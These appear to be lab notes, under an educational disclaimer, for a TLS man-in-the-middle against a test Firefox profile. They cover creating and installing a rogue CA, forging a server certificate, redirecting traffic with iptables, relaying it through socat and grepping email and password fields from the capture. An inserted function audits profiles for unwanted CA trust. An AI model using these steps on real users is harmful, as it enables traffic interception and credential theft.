Disclaimer
The information contained on this page is for educational purposes only.
Using it for other purposes will most likely be considered an illegal activity.
I, the author of this page, decline any direct or indirect responsibility that might arise from the usage of the information contained on this page.
You have been warned!
Browser
- create a new profile:
firefox -ProfileManager -new-instance -no-remote -private
- use the new profile:
firefox -P experiments -new-instance -no-remote -private
- with Xnest:
/usr/bin/Xnest -geometry 800x600 :1
/usr/bin/Xephyr -screen 800x600 -dpi 120 -host-cursor :1
env DISPLAY=:1 /usr/bin/i3
env DISPLAY=:1 /usr/bin/firefox -P experiments -new-instance -no-remote -private
xlsclients -l
import -crop 800x600+0+0 -window ... /tmp/firefox-experiments-capture.png
Rogue CA
- create a new CA certificate:
- create the private key:
certtool --generate-privkey \
  --sec-param low \
  --outfile /tmp/evil-ca.private.pem
- create the certificate (self-signed):
certtool --generate-self-signed \
  --load-privkey /tmp/evil-ca.private.pem \
  --template /dev/fd/3 \
  --outfile /tmp/evil-ca.certificate.pem \
  3<<"EOS"
cn = "Evil CA"
expiration_days = 1
ca
serial = 1
EOS
- install the CA certificate:
certutil -A \
  -n 'Evil CA' \
  -t 'cC' \
  -i /tmp/evil-ca.certificate.pem \
  -d /tmp/firefox-experiments-profile
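- audit a profile for CA trust that should not be there (added example, not part of the original notes; it assumes the `certutil -L` listing layout shown in the constructed sample and an allowlist of nicknames supplied by you):

```shell
# Read `certutil -L -d <profile-dir>` output on stdin and print every nickname
# whose SSL trust column grants CA or peer trust (flags C, T or P) and that is
# not in the allowlist ($1, one nickname per line). Added example, not part of
# the original notes; the listing layout parsed here is an assumption.
audit_nss_trust() {
  awk -v allow="$1" '
    BEGIN { n = split(allow, a, "\n"); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    NF == 0 { next }
    # rows end in a trust string such as "CT,C,C" or "cC,,"; header lines do not
    $NF !~ /^[pPcCTuw]*(,[pPcCTuw]*)?(,[pPcCTuw]*)?$/ { next }
    {
      trust = $NF
      split(trust, col, ",")                    # col[1] = SSL trust flags
      nick = $0
      sub(/[ \t]+[^ \t]+[ \t]*$/, "", nick)     # drop the trust field, keep the nickname
      if (col[1] ~ /[CTP]/ && !(nick in ok)) print nick " [" trust "]"
    }'
}

# Constructed sample of `certutil -L -d /tmp/firefox-experiments-profile` after
# the "Evil CA" above was added with -t 'cC'.
SAMPLE_LISTING='Certificate Nickname                                         Trust Attributes
                                                             SSL,S/MIME,JAR/XPI

Corp Root CA                                                 CT,C,C
my client cert                                               u,u,u
Evil CA                                                      cC,,'

# Nicknames that are expected to carry CA trust in this profile (assumed).
ALLOWLIST='Corp Root CA'

# Returns the findings for the sample; on a real profile, pipe
# `certutil -L -d <profile-dir>` into audit_nss_trust instead.
audit_sample() {
  printf '%s\n' "$SAMPLE_LISTING" | audit_nss_trust "$ALLOWLIST"
}

audit_sample
```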
Rogue Server
- create a new server certificate:
- create the private key:
certtool --generate-privkey \
  --sec-param low \
  --outfile /tmp/evil-server.private.pem
- create the certificate request:
certtool --generate-request \
  --load-privkey /tmp/evil-server.private.pem \
  --template /dev/fd/3 \
  --outfile /tmp/evil-server.request.pem \
  3<<"EOS"
cn = "Evil Server"
tls_www_server
dns_name = "www.example.com"
EOS
- create the certificate (sign the server request with the CA certificate):
certtool --generate-certificate \
  --load-request /tmp/evil-server.request.pem \
  --load-ca-certificate /tmp/evil-ca.certificate.pem \
  --load-ca-privkey /tmp/evil-ca.private.pem \
  --template /dev/fd/3 \
  --outfile /tmp/evil-server.certificate.pem \
  3<<"EOS"
cn = "Evil Server"
expiration_days = 1
tls_www_server
dns_name = "www.example.com"
serial = 2
EOS
Rogue router
- prepare forwarding:
iptables -t nat -A OUTPUT -p tcp -d 192.0.2.2 -m tcp --dport 443 -j DNAT --to-destination 127.99.99.99:9992
iptables -t nat -A OUTPUT -p tcp -d 192.0.2.2 -m tcp --dport 80 -j DNAT --to-destination 203.0.113.1:80
iptables -t nat -A OUTPUT -p tcp -d 192.0.2.1 -j DNAT --to-destination 203.0.113.1
- start the new server:
socat -v -x \
  openssl-listen:9992,bind=127.99.99.99,reuseaddr,fork,verify=0,key=/tmp/evil-server.private.pem,certificate=/tmp/evil-server.certificate.pem \
  openssl-connect:192.0.2.1:443,verify=0 \
  2>/tmp/evil-server.dump
- watch the server:
tail -f /tmp/evil-server.dump \
  | sed -r -u \
      -e '/^(< |> |--)/d' \
      -e '/^[0-9]{4}\/[0-9]{2}\/[0-9]{2} /d' \
      -e 's/^( [0-9a-f]{2}){,16}[ ]+ (.*)$/\2/g' \
      -e t \
      -e 'w/dev/stderr' \
      -e 'Q1' \
  | tr -d '\n' \
  | grep -o -E -e '&(email|pass)=[^&]+'